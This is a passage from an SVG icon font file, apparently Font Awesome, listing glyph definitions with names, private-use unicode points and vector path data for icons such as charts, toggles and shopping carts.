d="M1150 462v-109q0 -50 -36.5 -89t-94 -60.5t-118 -32.5t-117.5 -11q-205 0 -342.5 139t-137.5 346q0 203 136 339t339 136q34 0 75.5 -4.5t93 -18t92.5 -34t69 -56.5t28 -81v-109q0 -16 -16 -16h-118q-16 0 -16 16v70q0 43 -65.5 67.5t-137.5 24.5q-140 0 -228.5 -91.5
t-88.5 -237.5q0 -151 91.5 -249.5t233.5 -98.5q68 0 138 24t70 66v70q0 7 4.5 11.5t10.5 4.5h119q6 0 11 -4.5t5 -11.5zM768 1280q-130 0 -248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5
t-51 248.5t-136.5 204t-204 136.5t-248.5 51zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_475" unicode="&#xf1fa;" 
d="M972 761q0 108 -53.5 169t-147.5 61q-63 0 -124 -30.5t-110 -84.5t-79.5 -137t-30.5 -180q0 -112 53.5 -173t150.5 -61q96 0 176 66.5t122.5 166t42.5 203.5zM1536 640q0 -111 -37 -197t-98.5 -135t-131.5 -74.5t-145 -27.5q-6 0 -15.5 -0.5t-16.5 -0.5q-95 0 -142 53
q-28 33 -33 83q-52 -66 -131.5 -110t-173.5 -44q-161 0 -249.5 95.5t-88.5 269.5q0 157 66 290t179 210.5t246 77.5q87 0 155 -35.5t106 -99.5l2 19l11 56q1 6 5.5 12t9.5 6h118q5 0 13 -11q5 -5 3 -16l-120 -614q-5 -24 -5 -48q0 -39 12.5 -52t44.5 -13q28 1 57 5.5t73 24
t77 50t57 89.5t24 137q0 292 -174 466t-466 174q-130 0 -248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51q228 0 405 144q11 9 24 8t21 -12l41 -49q8 -12 7 -24q-2 -13 -12 -22q-102 -83 -227.5 -128t-258.5 -45q-156 0 -298 61
t-245 164t-164 245t-61 298t61 298t164 245t245 164t298 61q344 0 556 -212t212 -556z" />
    <glyph glyph-name="_476" unicode="&#xf1fb;" horiz-adv-x="1792" 
d="M1698 1442q94 -94 94 -226.5t-94 -225.5l-225 -223l104 -104q10 -10 10 -23t-10 -23l-210 -210q-10 -10 -23 -10t-23 10l-105 105l-603 -603q-37 -37 -90 -37h-203l-256 -128l-64 64l128 256v203q0 53 37 90l603 603l-105 105q-10 10 -10 23t10 23l210 210q10 10 23 10
t23 -10l104 -104l223 225q93 94 225.5 94t226.5 -94zM512 64l576 576l-192 192l-576 -576v-192h192z" />
    <glyph glyph-name="f1fc" unicode="&#xf1fc;" horiz-adv-x="1792" 
d="M1615 1536q70 0 122.5 -46.5t52.5 -116.5q0 -63 -45 -151q-332 -629 -465 -752q-97 -91 -218 -91q-126 0 -216.5 92.5t-90.5 219.5q0 128 92 212l638 579q59 54 130 54zM706 502q39 -76 106.5 -130t150.5 -76l1 -71q4 -213 -129.5 -347t-348.5 -134q-123 0 -218 46.5
t-152.5 127.5t-86.5 183t-29 220q7 -5 41 -30t62 -44.5t59 -36.5t46 -17q41 0 55 37q25 66 57.5 112.5t69.5 76t88 47.5t103 25.5t125 10.5z" />
    <glyph glyph-name="_478" unicode="&#xf1fd;" horiz-adv-x="1792" 
d="M1792 128v-384h-1792v384q45 0 85 14t59 27.5t47 37.5q30 27 51.5 38t56.5 11q24 0 44 -7t31 -15t33 -27q29 -25 47 -38t58 -27t86 -14q45 0 85 14.5t58 27t48 37.5q21 19 32.5 27t31 15t43.5 7q35 0 56.5 -11t51.5 -38q28 -24 47 -37.5t59 -27.5t85 -14t85 14t59 27.5
t47 37.5q30 27 51.5 38t56.5 11q34 0 55.5 -11t51.5 -38q28 -24 47 -37.5t59 -27.5t85 -14zM1792 448v-192q-24 0 -44 7t-31 15t-33 27q-29 25 -47 38t-58 27t-85 14q-46 0 -86 -14t-58 -27t-47 -38q-22 -19 -33 -27t-31 -15t-44 -7q-35 0 -56.5 11t-51.5 38q-29 25 -47 38
t-58 27t-86 14q-45 0 -85 -14.5t-58 -27t-48 -37.5q-21 -19 -32.5 -27t-31 -15t-43.5 -7q-35 0 -56.5 11t-51.5 38q-28 24 -47 37.5t-59 27.5t-85 14q-46 0 -86 -14t-58 -27t-47 -38q-30 -27 -51.5 -38t-56.5 -11v192q0 80 56 136t136 56h64v448h256v-448h256v448h256v-448
h256v448h256v-448h64q80 0 136 -56t56 -136zM512 1312q0 -77 -36 -118.5t-92 -41.5q-53 0 -90.5 37.5t-37.5 90.5q0 29 9.5 51t23.5 34t31 28t31 31.5t23.5 44.5t9.5 67q38 0 83 -74t45 -150zM1024 1312q0 -77 -36 -118.5t-92 -41.5q-53 0 -90.5 37.5t-37.5 90.5
q0 29 9.5 51t23.5 34t31 28t31 31.5t23.5 44.5t9.5 67q38 0 83 -74t45 -150zM1536 1312q0 -77 -36 -118.5t-92 -41.5q-53 0 -90.5 37.5t-37.5 90.5q0 29 9.5 51t23.5 34t31 28t31 31.5t23.5 44.5t9.5 67q38 0 83 -74t45 -150z" />
    <glyph glyph-name="_479" unicode="&#xf1fe;" horiz-adv-x="2048" 
d="M2048 0v-128h-2048v1536h128v-1408h1920zM1664 1024l256 -896h-1664v576l448 576l576 -576z" />
    <glyph glyph-name="_480" unicode="&#xf200;" horiz-adv-x="1792" 
d="M768 646l546 -546q-106 -108 -247.5 -168t-298.5 -60q-209 0 -385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103v-762zM955 640h773q0 -157 -60 -298.5t-168 -247.5zM1664 768h-768v768q209 0 385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_481" unicode="&#xf201;" horiz-adv-x="2048" 
d="M2048 0v-128h-2048v1536h128v-1408h1920zM1920 1248v-435q0 -21 -19.5 -29.5t-35.5 7.5l-121 121l-633 -633q-10 -10 -23 -10t-23 10l-233 233l-416 -416l-192 192l585 585q10 10 23 10t23 -10l233 -233l464 464l-121 121q-16 16 -7.5 35.5t29.5 19.5h435q14 0 23 -9
t9 -23z" />
    <glyph glyph-name="_482" unicode="&#xf202;" horiz-adv-x="1792" 
d="M1292 832q0 -6 10 -41q10 -29 25 -49.5t41 -34t44 -20t55 -16.5q325 -91 325 -332q0 -146 -105.5 -242.5t-254.5 -96.5q-59 0 -111.5 18.5t-91.5 45.5t-77 74.5t-63 87.5t-53.5 103.5t-43.5 103t-39.5 106.5t-35.5 95q-32 81 -61.5 133.5t-73.5 96.5t-104 64t-142 20
q-96 0 -183 -55.5t-138 -144.5t-51 -185q0 -160 106.5 -279.5t263.5 -119.5q177 0 258 95q56 63 83 116l84 -152q-15 -34 -44 -70l1 -1q-131 -152 -388 -152q-147 0 -269.5 79t-190.5 207.5t-68 274.5q0 105 43.5 206t116 176.5t172 121.5t204.5 46q87 0 159 -19t123.5 -50
t95 -80t72.5 -99t58.5 -117t50.5 -124.5t50 -130.5t55 -127q96 -200 233 -200q81 0 138.5 48.5t57.5 128.5q0 42 -19 72t-50.5 46t-72.5 31.5t-84.5 27t-87.5 34t-81 52t-65 82t-39 122.5q-3 16 -3 33q0 110 87.5 192t198.5 78q78 -3 120.5 -14.5t90.5 -53.5h-1
q12 -11 23 -24.5t26 -36t19 -27.5l-129 -99q-26 49 -54 70v1q-23 21 -97 21q-49 0 -84 -33t-35 -83z" />
    <glyph glyph-name="_483" unicode="&#xf203;" 
d="M1432 484q0 173 -234 239q-35 10 -53 16.5t-38 25t-29 46.5q0 2 -2 8.5t-3 12t-1 7.5q0 36 24.5 59.5t60.5 23.5q54 0 71 -15h-1q20 -15 39 -51l93 71q-39 54 -49 64q-33 29 -67.5 39t-85.5 10q-80 0 -142 -57.5t-62 -137.5q0 -7 2 -23q16 -96 64.5 -140t148.5 -73
q29 -8 49 -15.5t45 -21.5t38.5 -34.5t13.5 -46.5v-5q1 -58 -40.5 -93t-100.5 -35q-97 0 -167 144q-23 47 -51.5 121.5t-48 125.5t-54 110.5t-74 95.5t-103.5 60.5t-147 24.5q-101 0 -192 -56t-144 -148t-50 -192v-1q4 -108 50.5 -199t133.5 -147.5t196 -56.5q186 0 279 110
q20 27 31 51l-60 109q-42 -80 -99 -116t-146 -36q-115 0 -191 87t-76 204q0 105 82 189t186 84q112 0 170 -53.5t104 -172.5q8 -21 25.5 -68.5t28.5 -76.5t31.5 -74.5t38.5 -74t45.5 -62.5t55.5 -53.5t66 -33t80 -13.5q107 0 183 69.5t76 174.5zM1536 1120v-960
q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_484" unicode="&#xf204;" horiz-adv-x="2048" 
d="M1152 640q0 104 -40.5 198.5t-109.5 163.5t-163.5 109.5t-198.5 40.5t-198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5t198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5zM1920 640q0 104 -40.5 198.5
t-109.5 163.5t-163.5 109.5t-198.5 40.5h-386q119 -90 188.5 -224t69.5 -288t-69.5 -288t-188.5 -224h386q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5zM2048 640q0 -130 -51 -248.5t-136.5 -204t-204 -136.5t-248.5 -51h-768q-130 0 -248.5 51t-204 136.5
t-136.5 204t-51 248.5t51 248.5t136.5 204t204 136.5t248.5 51h768q130 0 248.5 -51t204 -136.5t136.5 -204t51 -248.5z" />
    <glyph glyph-name="_485" unicode="&#xf205;" horiz-adv-x="2048" 
d="M0 640q0 130 51 248.5t136.5 204t204 136.5t248.5 51h768q130 0 248.5 -51t204 -136.5t136.5 -204t51 -248.5t-51 -248.5t-136.5 -204t-204 -136.5t-248.5 -51h-768q-130 0 -248.5 51t-204 136.5t-136.5 204t-51 248.5zM1408 128q104 0 198.5 40.5t163.5 109.5
t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5t-163.5 109.5t-198.5 40.5t-198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5z" />
    <glyph glyph-name="_486" unicode="&#xf206;" horiz-adv-x="2304" 
d="M762 384h-314q-40 0 -57.5 35t6.5 67l188 251q-65 31 -137 31q-132 0 -226 -94t-94 -226t94 -226t226 -94q115 0 203 72.5t111 183.5zM576 512h186q-18 85 -75 148zM1056 512l288 384h-480l-99 -132q105 -103 126 -252h165zM2176 448q0 132 -94 226t-226 94
q-60 0 -121 -24l174 -260q15 -23 10 -49t-27 -40q-15 -11 -36 -11q-35 0 -53 29l-174 260q-93 -95 -93 -225q0 -132 94 -226t226 -94t226 94t94 226zM2304 448q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 97 39.5 183.5t109.5 149.5l-65 98l-353 -469
q-18 -26 -51 -26h-197q-23 -164 -149 -274t-294 -110q-185 0 -316.5 131.5t-131.5 316.5t131.5 316.5t316.5 131.5q114 0 215 -55l137 183h-224q-26 0 -45 19t-19 45t19 45t45 19h384v-128h435l-85 128h-222q-26 0 -45 19t-19 45t19 45t45 19h256q33 0 53 -28l267 -400
q91 44 192 44q185 0 316.5 -131.5t131.5 -316.5z" />
    <glyph glyph-name="_487" unicode="&#xf207;" 
d="M384 320q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1408 320q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1362 716l-72 384q-5 23 -22.5 37.5t-40.5 14.5
h-918q-23 0 -40.5 -14.5t-22.5 -37.5l-72 -384q-5 -30 14 -53t49 -23h1062q30 0 49 23t14 53zM1136 1328q0 20 -14 34t-34 14h-640q-20 0 -34 -14t-14 -34t14 -34t34 -14h640q20 0 34 14t14 34zM1536 603v-603h-128v-128q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5
t-37.5 90.5v128h-768v-128q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5v128h-128v603q0 112 25 223l103 454q9 78 97.5 137t230 89t312.5 30t312.5 -30t230 -89t97.5 -137l105 -454q23 -102 23 -223z" />
    <glyph glyph-name="_488" unicode="&#xf208;" horiz-adv-x="2048" 
d="M1463 704q0 -35 -25 -60.5t-61 -25.5h-702q-36 0 -61 25.5t-25 60.5t25 60.5t61 25.5h702q36 0 61 -25.5t25 -60.5zM1677 704q0 86 -23 170h-982q-36 0 -61 25t-25 60q0 36 25 61t61 25h908q-88 143 -235 227t-320 84q-177 0 -327.5 -87.5t-238 -237.5t-87.5 -327
q0 -86 23 -170h982q36 0 61 -25t25 -60q0 -36 -25 -61t-61 -25h-908q88 -143 235.5 -227t320.5 -84q132 0 253 51.5t208 139t139 208t52 253.5zM2048 959q0 -35 -25 -60t-61 -25h-131q17 -85 17 -170q0 -167 -65.5 -319.5t-175.5 -263t-262.5 -176t-319.5 -65.5
q-246 0 -448.5 133t-301.5 350h-189q-36 0 -61 25t-25 61q0 35 25 60t61 25h132q-17 85 -17 170q0 167 65.5 319.5t175.5 263t262.5 176t320.5 65.5q245 0 447.5 -133t301.5 -350h188q36 0 61 -25t25 -61z" />
    <glyph glyph-name="_489" unicode="&#xf209;" horiz-adv-x="1280" 
d="M953 1158l-114 -328l117 -21q165 451 165 518q0 56 -38 56q-57 0 -130 -225zM654 471l33 -88q37 42 71 67l-33 5.5t-38.5 7t-32.5 8.5zM362 1367q0 -98 159 -521q17 10 49 10q15 0 75 -5l-121 351q-75 220 -123 220q-19 0 -29 -17.5t-10 -37.5zM283 608q0 -36 51.5 -119
t117.5 -153t100 -70q14 0 25.5 13t11.5 27q0 24 -32 102q-13 32 -32 72t-47.5 89t-61.5 81t-62 32q-20 0 -45.5 -27t-25.5 -47zM125 273q0 -41 25 -104q59 -145 183.5 -227t281.5 -82q227 0 382 170q152 169 152 427q0 43 -1 67t-11.5 62t-30.5 56q-56 49 -211.5 75.5
t-270.5 26.5q-37 0 -49 -11q-12 -5 -12 -35q0 -34 21.5 -60t55.5 -40t77.5 -23.5t87.5 -11.5t85 -4t70 0h23q24 0 40 -19q15 -19 19 -55q-28 -28 -96 -54q-61 -22 -93 -46q-64 -46 -108.5 -114t-44.5 -137q0 -31 18.5 -88.5t18.5 -87.5l-3 -12q-4 -12 -4 -14
q-137 10 -146 216q-8 -2 -41 -2q2 -7 2 -21q0 -53 -40.5 -89.5t-94.5 -36.5q-82 0 -166.5 78t-84.5 159q0 34 33 67q52 -64 60 -76q77 -104 133 -104q12 0 26.5 8.5t14.5 20.5q0 34 -87.5 145t-116.5 111q-43 0 -70 -44.5t-27 -90.5zM11 264q0 101 42.5 163t136.5 88
q-28 74 -28 104q0 62 61 123t122 61q29 0 70 -15q-163 462 -163 567q0 80 41 130.5t119 50.5q131 0 325 -581q6 -17 8 -23q6 16 29 79.5t43.5 118.5t54 127.5t64.5 123t70.5 86.5t76.5 36q71 0 112 -49t41 -122q0 -108 -159 -550q61 -15 100.5 -46t58.5 -78t26 -93.5
t7 -110.5q0 -150 -47 -280t-132 -225t-211 -150t-278 -55q-111 0 -223 42q-149 57 -258 191.5t-109 286.5z" />
    <glyph glyph-name="_490" unicode="&#xf20a;" horiz-adv-x="2048" 
d="M785 528h207q-14 -158 -98.5 -248.5t-214.5 -90.5q-162 0 -254.5 116t-92.5 316q0 194 93 311.5t233 117.5q148 0 232 -87t97 -247h-203q-5 64 -35.5 99t-81.5 35q-57 0 -88.5 -60.5t-31.5 -177.5q0 -48 5 -84t18 -69.5t40 -51.5t66 -18q95 0 109 139zM1497 528h206
q-14 -158 -98 -248.5t-214 -90.5q-162 0 -254.5 116t-92.5 316q0 194 93 311.5t233 117.5q148 0 232 -87t97 -247h-204q-4 64 -35 99t-81 35q-57 0 -88.5 -60.5t-31.5 -177.5q0 -48 5 -84t18 -69.5t39.5 -51.5t65.5 -18q49 0 76.5 38t33.5 101zM1856 647q0 207 -15.5 307
t-60.5 161q-6 8 -13.5 14t-21.5 15t-16 11q-86 63 -697 63q-625 0 -710 -63q-5 -4 -17.5 -11.5t-21 -14t-14.5 -14.5q-45 -60 -60 -159.5t-15 -308.5q0 -208 15 -307.5t60 -160.5q6 -8 15 -15t20.5 -14t17.5 -12q44 -33 239.5 -49t470.5 -16q610 0 697 65q5 4 17 11t20.5 14
t13.5 16q46 60 61 159t15 309zM2048 1408v-1536h-2048v1536h2048z" />
    <glyph glyph-name="_491" unicode="&#xf20b;" 
d="M992 912v-496q0 -14 -9 -23t-23 -9h-160q-14 0 -23 9t-9 23v496q0 112 -80 192t-192 80h-272v-1152q0 -14 -9 -23t-23 -9h-160q-14 0 -23 9t-9 23v1344q0 14 9 23t23 9h464q135 0 249 -66.5t180.5 -180.5t66.5 -249zM1376 1376v-880q0 -135 -66.5 -249t-180.5 -180.5
t-249 -66.5h-464q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h160q14 0 23 -9t9 -23v-768h272q112 0 192 80t80 192v880q0 14 9 23t23 9h160q14 0 23 -9t9 -23z" />
    <glyph glyph-name="_492" unicode="&#xf20c;" 
d="M1311 694v-114q0 -24 -13.5 -38t-37.5 -14h-202q-24 0 -38 14t-14 38v114q0 24 14 38t38 14h202q24 0 37.5 -14t13.5 -38zM821 464v250q0 53 -32.5 85.5t-85.5 32.5h-133q-68 0 -96 -52q-28 52 -96 52h-130q-53 0 -85.5 -32.5t-32.5 -85.5v-250q0 -22 21 -22h55
q22 0 22 22v230q0 24 13.5 38t38.5 14h94q24 0 38 -14t14 -38v-230q0 -22 21 -22h54q22 0 22 22v230q0 24 14 38t38 14h97q24 0 37.5 -14t13.5 -38v-230q0 -22 22 -22h55q21 0 21 22zM1410 560v154q0 53 -33 85.5t-86 32.5h-264q-53 0 -86 -32.5t-33 -85.5v-410
q0 -21 22 -21h55q21 0 21 21v180q31 -42 94 -42h191q53 0 86 32.5t33 85.5zM1536 1176v-1072q0 -96 -68 -164t-164 -68h-1072q-96 0 -164 68t-68 164v1072q0 96 68 164t164 68h1072q96 0 164 -68t68 -164z" />
    <glyph glyph-name="_493" unicode="&#xf20d;" 
d="M915 450h-294l147 551zM1001 128h311l-324 1024h-440l-324 -1024h311l383 314zM1536 1120v-960q0 -118 -85 -203t-203 -85h-960q-118 0 -203 85t-85 203v960q0 118 85 203t203 85h960q118 0 203 -85t85 -203z" />
    <glyph glyph-name="_494" unicode="&#xf20e;" horiz-adv-x="2048" 
d="M2048 641q0 -21 -13 -36.5t-33 -19.5l-205 -356q3 -9 3 -18q0 -20 -12.5 -35.5t-32.5 -19.5l-193 -337q3 -8 3 -16q0 -23 -16.5 -40t-40.5 -17q-25 0 -41 18h-400q-17 -20 -43 -20t-43 20h-399q-17 -20 -43 -20q-23 0 -40 16.5t-17 40.5q0 8 4 20l-193 335
q-20 4 -32.5 19.5t-12.5 35.5q0 9 3 18l-206 356q-20 5 -32.5 20.5t-12.5 35.5q0 21 13.5 36.5t33.5 19.5l199 344q0 1 -0.5 3t-0.5 3q0 36 34 51l209 363q-4 10 -4 18q0 24 17 40.5t40 16.5q26 0 44 -21h396q16 21 43 21t43 -21h398q18 21 44 21q23 0 40 -16.5t17 -40.5
q0 -6 -4 -18l207 -358q23 -1 39 -17.5t16 -38.5q0 -13 -7 -27l187 -324q19 -4 31.5 -19.5t12.5 -35.5zM1063 -158h389l-342 354h-143l-342 -354h360q18 16 39 16t39 -16zM112 654q1 -4 1 -13q0 -10 -2 -15l208 -360l15 -6l188 199v347l-187 194q-13 -8 -29 -10zM986 1438
h-388l190 -200l554 200h-280q-16 -16 -38 -16t-38 16zM1689 226q1 6 5 11l-64 68l-17 -79h76zM1583 226l22 105l-252 266l-296 -307l63 -64h463zM1495 -142l16 28l65 310h-427l333 -343q8 4 13 5zM578 -158h5l342 354h-373v-335l4 -6q14 -5 22 -13zM552 226h402l64 66
l-309 321l-157 -166v-221zM359 226h163v189l-168 -177q4 -8 5 -12zM358 1051q0 -1 0.5 -2t0.5 -2q0 -16 -8 -29l171 -177v269zM552 1121v-311l153 -157l297 314l-223 236zM556 1425l-4 -8v-264l205 74l-191 201q-6 -2 -10 -3zM1447 1438h-16l-621 -224l213 -225zM1023 946
l-297 -315l311 -319l296 307zM688 634l-136 141v-284zM1038 270l-42 -44h85zM1374 618l238 -251l132 624l-3 5l-1 1zM1718 1018q-8 13 -8 29v2l-216 376q-5 1 -13 5l-437 -463l310 -327zM522 1142v223l-163 -282zM522 196h-163l163 -283v283zM1607 196l-48 -227l130 227h-82
zM1729 266l207 361q-2 10 -2 14q0 1 3 16l-171 296l-129 -612l77 -82q5 3 15 7z" />
    <glyph glyph-name="f210" unicode="&#xf210;" 
d="M0 856q0 131 91.5 226.5t222.5 95.5h742l352 358v-1470q0 -132 -91.5 -227t-222.5 -95h-780q-131 0 -222.5 95t-91.5 227v790zM1232 102l-176 180v425q0 46 -32 79t-78 33h-484q-46 0 -78 -33t-32 -79v-492q0 -46 32.5 -79.5t77.5 -33.5h770z" />
    <glyph glyph-name="_496" unicode="&#xf211;" 
d="M934 1386q-317 -121 -556 -362.5t-358 -560.5q-20 89 -20 176q0 208 102.5 384.5t278.5 279t384 102.5q82 0 169 -19zM1203 1267q93 -65 164 -155q-389 -113 -674.5 -400.5t-396.5 -676.5q-93 72 -155 162q112 386 395 671t667 399zM470 -67q115 356 379.5 622t619.5 384
q40 -92 54 -195q-292 -120 -516 -345t-343 -518q-103 14 -194 52zM1536 -125q-193 50 -367 115q-135 -84 -290 -107q109 205 274 370.5t369 275.5q-21 -152 -101 -284q65 -175 115 -370z" />
    <glyph glyph-name="f212" unicode="&#xf212;" horiz-adv-x="2048" 
d="M1893 1144l155 -1272q-131 0 -257 57q-200 91 -393 91q-226 0 -374 -148q-148 148 -374 148q-193 0 -393 -91q-128 -57 -252 -57h-5l155 1272q224 127 482 127q233 0 387 -106q154 106 387 106q258 0 482 -127zM1398 157q129 0 232 -28.5t260 -93.5l-124 1021
q-171 78 -368 78q-224 0 -374 -141q-150 141 -374 141q-197 0 -368 -78l-124 -1021q105 43 165.5 65t148.5 39.5t178 17.5q202 0 374 -108q172 108 374 108zM1438 191l-55 907q-211 -4 -359 -155q-152 155 -374 155q-176 0 -336 -66l-114 -941q124 51 228.5 76t221.5 25
q209 0 374 -102q172 107 374 102z" />
    <glyph glyph-name="_498" unicode="&#xf213;" horiz-adv-x="2048" 
d="M1500 165v733q0 21 -15 36t-35 15h-93q-20 0 -35 -15t-15 -36v-733q0 -20 15 -35t35 -15h93q20 0 35 15t15 35zM1216 165v531q0 20 -15 35t-35 15h-101q-20 0 -35 -15t-15 -35v-531q0 -20 15 -35t35 -15h101q20 0 35 15t15 35zM924 165v429q0 20 -15 35t-35 15h-101
q-20 0 -35 -15t-15 -35v-429q0 -20 15 -35t35 -15h101q20 0 35 15t15 35zM632 165v362q0 20 -15 35t-35 15h-101q-20 0 -35 -15t-15 -35v-362q0 -20 15 -35t35 -15h101q20 0 35 15t15 35zM2048 311q0 -166 -118 -284t-284 -118h-1244q-166 0 -284 118t-118 284
q0 116 63 214.5t168 148.5q-10 34 -10 73q0 113 80.5 193.5t193.5 80.5q102 0 180 -67q45 183 194 300t338 117q149 0 275 -73.5t199.5 -199.5t73.5 -275q0 -66 -14 -122q135 -33 221 -142.5t86 -247.5z" />
    <glyph glyph-name="_499" unicode="&#xf214;" 
d="M0 1536h1536v-1392l-776 -338l-760 338v1392zM1436 209v926h-1336v-926l661 -294zM1436 1235v201h-1336v-201h1336zM181 937v-115h-37v115h37zM181 789v-115h-37v115h37zM181 641v-115h-37v115h37zM181 493v-115h-37v115h37zM181 345v-115h-37v115h37zM207 202l15 34
l105 -47l-15 -33zM343 142l15 34l105 -46l-15 -34zM478 82l15 34l105 -46l-15 -34zM614 23l15 33l104 -46l-15 -34zM797 10l105 46l15 -33l-105 -47zM932 70l105 46l15 -34l-105 -46zM1068 130l105 46l15 -34l-105 -46zM1203 189l105 47l15 -34l-105 -46zM259 1389v-36h-114
v36h114zM421 1389v-36h-115v36h115zM583 1389v-36h-115v36h115zM744 1389v-36h-114v36h114zM906 1389v-36h-114v36h114zM1068 1389v-36h-115v36h115zM1230 1389v-36h-115v36h115zM1391 1389v-36h-114v36h114zM181 1049v-79h-37v115h115v-36h-78zM421 1085v-36h-115v36h115z
M583 1085v-36h-115v36h115zM744 1085v-36h-114v36h114zM906 1085v-36h-114v36h114zM1068 1085v-36h-115v36h115zM1230 1085v-36h-115v36h115zM1355 970v79h-78v36h115v-115h-37zM1355 822v115h37v-115h-37zM1355 674v115h37v-115h-37zM1355 526v115h37v-115h-37zM1355 378
v115h37v-115h-37zM1355 230v115h37v-115h-37zM760 265q-129 0 -221 91.5t-92 221.5q0 129 92 221t221 92q130 0 221.5 -92t91.5 -221q0 -130 -91.5 -221.5t-221.5 -91.5zM595 646q0 -36 19.5 -56.5t49.5 -25t64 -7t64 -2t49.5 -9t19.5 -30.5q0 -49 -112 -49q-97 0 -123 51
h-3l-31 -63q67 -42 162 -42q29 0 56.5 5t55.5 16t45.5 33t17.5 53q0 46 -27.5 69.5t-67.5 27t-79.5 3t-67 5t-27.5 25.5q0 21 20.5 33t40.5 15t41 3q34 0 70.5 -11t51.5 -34h3l30 58q-3 1 -21 8.5t-22.5 9t-19.5 7t-22 7t-20 4.5t-24 4t-23 1q-29 0 -56.5 -5t-54 -16.5
t-43 -34t-16.5 -53.5z" />
    <glyph glyph-name="_500" unicode="&#xf215;" horiz-adv-x="2048" 
d="M863 504q0 112 -79.5 191.5t-191.5 79.5t-191 -79.5t-79 -191.5t79 -191t191 -79t191.5 79t79.5 191zM1726 505q0 112 -79 191t-191 79t-191.5 -79t-79.5 -191q0 -113 79.5 -192t191.5 -79t191 79.5t79 191.5zM2048 1314v-1348q0 -44 -31.5 -75.5t-76.5 -31.5h-1832
q-45 0 -76.5 31.5t-31.5 75.5v1348q0 44 31.5 75.5t76.5 31.5h431q44 0 76 -31.5t32 -75.5v-161h754v161q0 44 32 75.5t76 31.5h431q45 0 76.5 -31.5t31.5 -75.5z" />
    <glyph glyph-name="_501" unicode="&#xf216;" horiz-adv-x="2048" 
d="M1430 953zM1690 749q148 0 253 -98.5t105 -244.5q0 -157 -109 -261.5t-267 -104.5q-85 0 -162 27.5t-138 73.5t-118 106t-109 126t-103.5 132.5t-108.5 126.5t-117 106t-136 73.5t-159 27.5q-154 0 -251.5 -91.5t-97.5 -244.5q0 -157 104 -250t263 -93q100 0 208 37.5
t193 98.5q5 4 21 18.5t30 24t22 9.5q14 0 24.5 -10.5t10.5 -24.5q0 -24 -60 -77q-101 -88 -234.5 -142t-260.5 -54q-133 0 -245.5 58t-180 165t-67.5 241q0 205 141.5 341t347.5 136q120 0 226.5 -43.5t185.5 -113t151.5 -153t139 -167.5t133.5 -153.5t149.5 -113
t172.5 -43.5q102 0 168.5 61.5t66.5 162.5q0 95 -64.5 159t-159.5 64q-30 0 -81.5 -18.5t-68.5 -18.5q-20 0 -35.5 15t-15.5 35q0 18 8.5 57t8.5 59q0 159 -107.5 263t-266.5 104q-58 0 -111.5 -18.5t-84 -40.5t-55.5 -40.5t-33 -18.5q-15 0 -25.5 10.5t-10.5 25.5
q0 19 25 46q59 67 147 103.5t182 36.5q191 0 318 -125.5t127 -315.5q0 -37 -4 -66q57 15 115 15z" />
    <glyph glyph-name="_502" unicode="&#xf217;" horiz-adv-x="1664" 
d="M1216 832q0 26 -19 45t-45 19h-128v128q0 26 -19 45t-45 19t-45 -19t-19 -45v-128h-128q-26 0 -45 -19t-19 -45t19 -45t45 -19h128v-128q0 -26 19 -45t45 -19t45 19t19 45v128h128q26 0 45 19t19 45zM640 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5
t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1536 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1664 1088v-512q0 -24 -16 -42.5t-41 -21.5l-1044 -122q1 -7 4.5 -21.5t6 -26.5t2.5 -22q0 -16 -24 -64h920
q26 0 45 -19t19 -45t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 14 11 39.5t29.5 59.5t20.5 38l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t20 -15.5t13 -24.5t7.5 -26.5t5.5 -29.5t4.5 -25.5h1201q26 0 45 -19t19 -45z" />
    <glyph glyph-name="_503" unicode="&#xf218;" horiz-adv-x="1664" 
d="M1280 832q0 26 -19 45t-45 19t-45 -19l-147 -146v293q0 26 -19 45t-45 19t-45 -19t-19 -45v-293l-147 146q-19 19 -45 19t-45 -19t-19 -45t19 -45l256 -256q19 -19 45 -19t45 19l256 256q19 19 19 45zM640 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5
